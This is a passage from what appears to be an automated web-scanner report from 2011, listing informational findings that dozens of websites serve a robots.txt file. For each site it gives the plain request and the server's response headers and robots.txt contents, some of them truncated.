Date: Tue, 03 May 2011 10:27:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 18 Sep 2010 15:16:31 GMT
ETag: "7000086-38-4908a29fa51c0"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /images
Disallow: /cgi-bin

26.74. http://www.adsomega.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adsomega.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adsomega.com

Response

HTTP/1.0 200 OK
Connection: close
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-1114411316"
Last-Modified: Tue, 14 Sep 2010 21:25:55 GMT
Content-Length: 378
Date: Tue, 03 May 2011 10:24:20 GMT
Server: lighttpd/1.4.20

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

26.75. http://www.adstormer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adstormer.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adstormer.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:20 GMT
Server: Apache
Last-Modified: Thu, 01 Apr 2010 12:28:58 GMT
ETag: "40014920-130-4832c01bff680"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.76. http://www.aerotrader.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aerotrader.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aerotrader.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:18 GMT
Last-Modified: Wed, 19 May 2010 19:55:11 GMT
ETag: "2b8f56-f8-d5ed85c0"
Accept-Ranges: bytes
Content-Length: 248
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /find/listing/print/
Disallow: /find/listing/photos/
Disallow: /emailseller/
Disallow: /find/listing-emaillisting/
Disallow: /find/dealers/email/
Disallow: /find/website/
Disal
...[SNIP]...

26.77. http://www.afciviliancareers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.afciviliancareers.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.afciviliancareers.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:48 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
Last-Modified: Thu, 10 Mar 2011 11:03:35 GMT
ETag: "22491c-6c8-49e1ecbf6cfc0"
Accept-Ranges: bytes
Content-Length: 1736
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.78. http://www.agoraquest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.agoraquest.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.agoraquest.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 29 Apr 2011 19:56:56 GMT
ETag: "a4122e-17-4a21413701200"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

26.79. http://www.airgunsofarizona.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.airgunsofarizona.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.airgunsofarizona.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 Aug 2010 19:44:15 GMT
ETag: "5f51d95-5c-9756a1c0"
Accept-Ranges: bytes
Content-Length: 92
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Sitemap: http://www.airgunsofarizona.com/airgunsofarizona_sitemap.xml

26.80. http://www.alawar.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.alawar.ru
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alawar.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 03 May 2011 11:38:37 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 17 Mar 2009 06:12:10 GMT
ETag: "2a4a01-65-4654a7282c280"
Accept-Ranges: bytes
Content-Length: 101

User-agent: *
Disallow: /bitrix/
Disallow: /admin/
Disallow: /mobilegames/
Disallow: /download/

26.81. http://www.albany.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.albany.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.albany.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 22 Oct 2010 20:16:16 GMT
Accept-Ranges: bytes
ETag: "4056fbfa2572cb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 11:33:48 GMT
Connection: close
Content-Length: 238

User-agent: *
Disallow: /includes
Disallow: /errors
Disallow: /customtags
Disallow: /admin
Disallow: /leads
Disallow: /secure
Disallow: /mobile
Disallow: /chamber
Disallow: /Business/HEADER_L
...[SNIP]...

26.82. http://www.algaecal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.algaecal.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.algaecal.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 11:03:55 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-akhokmek=1324132F681BE0B0BED6806BC2002E67; path=/
Last-Modified: Fri, 05 Mar 2010 22:35:01 GMT
Content-Length: 505

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...

26.83. http://www.aliciasrecipes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aliciasrecipes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aliciasrecipes.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Tue, 03 May 2011 10:19:48 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-eacdndmj=DC8943E0451EE150FFE1F8F7A72FB222; path=/
Last-Modified: Fri, 26 Feb 2010 21:50:00 GMT
Content-Length: 34

User-agent: *
Disallow: /Print/

26.84. http://www.allaboutdrawings.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allaboutdrawings.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allaboutdrawings.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:59 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.allaboutdrawings.com/5fN4aVDg.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn
...[SNIP]...

26.85. http://www.allaboutjesuschrist.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allaboutjesuschrist.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allaboutjesuschrist.org

Response

HTTP/1.1 200 OK
Content-Length: 5376
Content-Type: text/plain
Last-Modified: Tue, 25 Sep 2007 17:00:17 GMT
Accept-Ranges: bytes
ETag: "8cfa2e8c95ffc71:93c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:19:42 GMT
Connection: close

#robots.txt for AllAboutJesusChrist.org
User-agent: *
Disallow: /common/
Disallow: /common/*.htm$
User-agent: googlebot
Disallow: /common/
Disallow: /common/*.htm$
User-agent: slurp
Disallow:
...[SNIP]...

26.86. http://www.allbran.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allbran.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allbran.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:52 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 1999 19:24:36 GMT
ETag: "1350b-55-35960059c6500"
Accept-Ranges: bytes
Content-Length: 85
P3P: CP="CURi ADMa DEVa OUR IND DSP IDC COR", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# /robots.txt file for http://www.kelloggs.com

User-agent: *
Disallow: /cgi-bin

26.87. http://www.allegiance.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allegiance.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allegiance.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:09 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 17 Aug 2009 22:52:37 GMT
ETag: "4d495f-17b-421e7740"
Accept-Ranges: bytes
Content-Length: 379
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt file for http://www.allegiance.com/
# 4/8/2009 11:52

User-agent: *
Disallow: /archive/
Disallow: /archive/marketing/regCollect.php
Disallow: /newsite/
Disallow: /resources/doclibsforce-
...[SNIP]...

26.88. http://www.allentate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allentate.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allentate.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 133
Content-Type: text/plain
Last-Modified: Tue, 27 Apr 2010 15:13:14 GMT
Accept-Ranges: bytes
ETag: "3ae99e281ce6ca1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:36:18 GMT
Connection: close
Set-Cookie: Coyote-2-42a2c514=42a2c504:0;Path=/

# robots.txt, www.allentate.com.com 1/9/2007
#

User-agent: *
Disallow: /admin

Sitemap: http://www.allentate.com/Sitemap.xml

26.89. http://www.allgame.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allgame.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allgame.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 05:46:19 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 01:35:50 GMT
ETag: "18099a-150-4856a435c6980"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Age: 17150
X-Cache: HIT from tul-3
Connection: close
Content-Length: 336

User-agent: Googlebot
Disallow:
Request-rate: 1/5
Crawl-delay: 1

User-agent: Slurp
Disallow:
Request-rate: 1/5
Crawl-delay: 1

User-agent: Teoma
Disallow:
Request-rate: 1/5
Crawl-delay:
...[SNIP]...

26.90. http://www.alltribes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.alltribes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alltribes.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 22 Mar 2011 11:31:43 GMT
ETag: "5b436af-6f-49f1096ac25c0"
Accept-Ranges: bytes
Content-Length: 111
Cache-Control: max-age=2592000
Expires: Thu, 02 Jun 2011 10:21:20 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /wholesale/
Disallow: /mobile/

Sitemap: http://www.alltribes.com/sitemap.xml

26.91. http://www.altermedia.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.altermedia.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.altermedia.info

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:00:02 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0c DAV/2
Vary: Cookie
X-Pingback: http://www.altermedia.info/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.altermedia.info/sitemap.xml.gz

26.92. http://www.alttransport.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.alttransport.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alttransport.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:01:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=i2vj9rr169rg6neldelsl2hqf2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://alttransport.com/xmlrpc.php
Vary: User-Agent,Accept-Encoding
Content-Length: 73
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://alttransport.com/sitemap.xml.gz

26.93. http://www.alvenda.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.alvenda.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alvenda.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:39 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 19:06:15 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: *

26.94. http://www.alvinisd.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.alvinisd.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alvinisd.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 22 Jul 2010 05:59:35 GMT
ETag: "328-48bf39f6edfc0"
Accept-Ranges: bytes
Content-Length: 808
Cache-Control: max-age=43200
Expires: Tue, 03 May 2011 22:45:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: msnbot

Disallow: /education/components/calendar/
Disallow: /local/components/calendar/
Disallow: /education/admin/
Disallow: /local/admin/
Disallow: /education/graphics/
Disallow: /local/
...[SNIP]...

26.95. http://www.am570radio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.am570radio.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.am570radio.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 01 May 2008 19:07:03 GMT
Content-Type: text/plain
Content-Length: 26
X-Varnish: 4192822585
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 11:24:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:37 GMT
Connection: close

User-agent: *
Disallow: /

26.96. http://www.amasci.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amasci.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amasci.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:58 GMT
Server: Apache/1.3.34 (Unix) mod_layout/3.3
Last-Modified: Thu, 03 Mar 2011 06:26:17 GMT
ETag: "fa70340-224-4d6f3489"
Accept-Ranges: bytes
Content-Length: 548
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /weird2/
Disallow: /~bloo/
Disallow: /~c/
Disallow: /~carol/
Disallow: /~dianee/
Disallow: /~davidk/
Disallow: /~demian/
Disallow: /
...[SNIP]...

26.97. http://www.amazinavenue.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazinavenue.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amazinavenue.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:12 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:38 GMT
ETag: "7e17e2-d0-49e83f79c2397"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

26.98. http://www.america-hijacked.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.america-hijacked.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.america-hijacked.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:33 GMT
Server: Apache mod_fcgid/2.3.6 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://america-hijacked.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.99. http://www.americancasinoguide.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.americancasinoguide.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americancasinoguide.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 04 Oct 2010 16:50:42 GMT
ETag: "62347-13f-491cd5843bc80"
Accept-Ranges: bytes
Content-Length: 319
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Di
...[SNIP]...

26.100. http://www.americandiscountcruises.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.americandiscountcruises.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americandiscountcruises.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 23 Dec 2010 19:28:38 GMT
ETag: "9059bb4-69-49818e0620580"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /demo_files
Disallow: /layers_site
Disallow: /oldsite_moved_JH
Disallow: /artwork

26.101. http://www.americanmedical-id.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.americanmedical-id.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.americanmedical-id.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:29 GMT
Server: Apache
Last-Modified: Wed, 24 Nov 2010 19:40:23 GMT
Accept-Ranges: bytes
Content-Length: 34
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /cgi-bin/

26.102. http://www.amsmeteors.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amsmeteors.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amsmeteors.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:57 GMT
Server: Apache
X-Pingback: http://www.amsmeteors.org/xmlrpc.php
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=7f0eda58019da36b80124e92dc830bab; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.amsmeteors.org/sitemap.xml.gz

26.103. http://www.ancestralfindings.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ancestralfindings.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ancestralfindings.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 PHP/4.3.10
Last-Modified: Sat, 05 Feb 2011 08:34:01 GMT
ETag: "5013de2-2b-49b84dc4f1040"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

26.104. http://www.animalbehaviorcollege.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.animalbehaviorcollege.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.animalbehaviorcollege.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 03 Oct 2007 00:37:00 GMT
Accept-Ranges: bytes
ETag: "05e8282555c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:26:15 GMT
Connection: close
Content-Length: 106

User-agent: *
Disallow: /ca/
Disallow: /lp/

Sitemap: http://www.animalbehaviorcollege.com/sitemap.xml

26.105. http://www.animecastle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.animecastle.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.animecastle.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Wed, 12 Nov 2008 16:19:02 GMT
Accept-Ranges: bytes
ETag: "b2b85b60e244c91:777"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:56:07 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

26.106. http://www.animenfo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.animenfo.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.animenfo.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:33 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 21:29:44 GMT
ETag: "1c7004-46-48d6ab70d6200"
Accept-Ranges: bytes
Content-Length: 70
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /include

User-agent: ia_archiver
Disallow: /

26.107. http://www.antiquecar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.antiquecar.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.antiquecar.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:16 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Jun 2010 20:45:40 GMT
ETag: "143ca08-788-489540b23db00"
Accept-Ranges: bytes
Content-Length: 1928
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: Googlebot
Disallow: /*?
Disallow: /subcat5
Disallow: /admin/
Disallow: /adpeeps/
Disallow: /backupdb/
Disallow: /displayIP/
Disallow: /ec_upda
...[SNIP]...

26.108. http://www.applianceguru.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.applianceguru.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.applianceguru.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:45 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Thu, 18 Nov 2010 00:59:52 GMT
ETag: "c2e901b-2d-495494eadb200"
Accept-Ranges: bytes
Content-Length: 45
Connection: close
Content-Type: text/plain

User-Agent: *

Crawl-delay: 3
Disallow: /?s=

26.109. http://www.appointmentquest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.appointmentquest.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.appointmentquest.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:54 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.7d
Last-Modified: Thu, 03 Apr 2003 10:19:38 GMT
ETag: "3875d-7b-3e8c0aba"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain

# robots.txt for http://www.appointmentquest.com/
User-agent: *
Disallow: /rs/
Disallow: /cgi-bin/
Disallow: /maintenance/

26.110. http://www.appolicious.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.appolicious.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.appolicious.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:42 GMT
Server: Apache
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-Runtime: 412
ETag: "4858d9d69cda400f9dac66a19ccc2e8a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _appolicious-site_session=BAh7BzoPc2Vzc2lvbl9pZCIlNmFiOWYyNTNlNTdjYjRkZDkzZTJiMTQ2YmFhYjg4ZTEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BzobdXNlcl9hY3Rpb25fdG9fcHVibGlzaDA6H3R3aXR0ZXJfbWVzc2FnZV90b19wdWJsaXNoMAY6CkB1c2Vkewc7B0Y7CEY%3D--64f6da45c5fbec1b41e258922f486f78476a4d94; path=/; HttpOnly
Content-Length: 92
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: Googlebot-Mobile
Disallow: /

User-agent: *
Disallow: /buy/
Disallow: /session/

26.111. http://www.aps.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aps.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aps.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:02 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 19:23:06 GMT
ETag: "8222a-23c-488c6119609b9"
Accept-Ranges: bytes
Content-Length: 572
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cache
Disallow: /cache.old
Disallow: /customcf
Disallow: /customfields
Disallow: /datasheet-modules
Disallow: /elementadmin
Disallow: /js
Disallow: /lex
Disallow: /me
...[SNIP]...

26.112. http://www.aquabid.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aquabid.com
Path:	/favicon.ico

